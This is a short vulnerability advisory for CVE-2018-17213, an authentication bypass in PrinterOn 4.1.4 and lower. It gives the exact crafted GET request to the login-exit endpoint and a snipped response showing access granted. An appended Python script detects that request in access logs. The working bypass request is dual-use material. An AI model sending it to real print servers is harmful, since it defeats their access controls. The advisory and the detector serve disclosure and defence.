CVE-2018-17213-Authentication Bypass-PrinterOn

The PrinterOn web application, versions 4.1.4 and lower, is vulnerable to an authentication bypass that allows attackers to gain access via a crafted GET request. Even if the print server is secured to allow only valid users to authenticate and has the “Allow Guest” functionality turned off, the vulnerability still occurs.

REQUEST:
GET /cps/aaalogin_exit?jobReferenceID=null&approveUse=TRUE HTTP/1.1
Host: YY.YY.YY.YY
RESPONSE:
HTTP/1.1 200 
<--SNIP-->
Server: PrinterOn 
 
<!DOCTYPE html>
<html lang="en">
    <head>
        <title>PrinterOn Printing Service</title>

<--SNIP-->

<h3 class="panel-title">

                                Step 1 - Choose a Printer
                           
<--SNIP-->
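
To check whether a server has already received the request shown above, the following added example (not part of the original README or of PrinterOn's code) scans access-log lines for that endpoint and flags hits that were answered with a 2xx status. It assumes a combined-format access log, for instance from a reverse proxy in front of the print server; the sample lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: combined-format access log from a reverse proxy in front of the server.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
ADVISORY_PATH = "/cps/aaalogin_exit"  # path from the advisory's request

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Oct/2018:10:00:00 +0000] "GET /cps/aaalogin_exit?jobReferenceID=null&approveUse=TRUE HTTP/1.1" 200 5120
192.0.2.11 - - [01/Oct/2018:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 812
198.51.100.7 - - [01/Oct/2018:10:01:00 +0000] "GET /cps/aaalogin_exit?approveuse=true&jobReferenceID=null HTTP/1.1" 200 5120
198.51.100.8 - - [01/Oct/2018:10:02:00 +0000] "GET /cps/aaalogin_exit?jobReferenceID=null&approveUse=TRUE HTTP/1.1" 403 0
"""

def classify(line):
    """Return a finding dict for requests to the advisory's endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # Normalise before comparing: decode %xx, collapse '//', ignore case and trailing '/'.
    path = re.sub(r"/{2,}", "/", unquote(parts.path)).rstrip("/").lower()
    if path != ADVISORY_PATH:
        return None
    approve = any(
        k.lower() == "approveuse" and v.strip().lower() == "true"
        for k, v in parse_qsl(parts.query, keep_blank_values=True)
    )
    status = int(m["status"])
    # A 2xx answer to the approveUse=TRUE form matches the response in the advisory.
    severity = "high" if approve and 200 <= status < 300 else "review"
    return {"ip": m["ip"], "status": status, "approve_use": approve, "severity": severity}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

A "high" finding means the request was served rather than rejected; confirm the installed version against the affected range (4.1.4 and lower) before closing it out.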
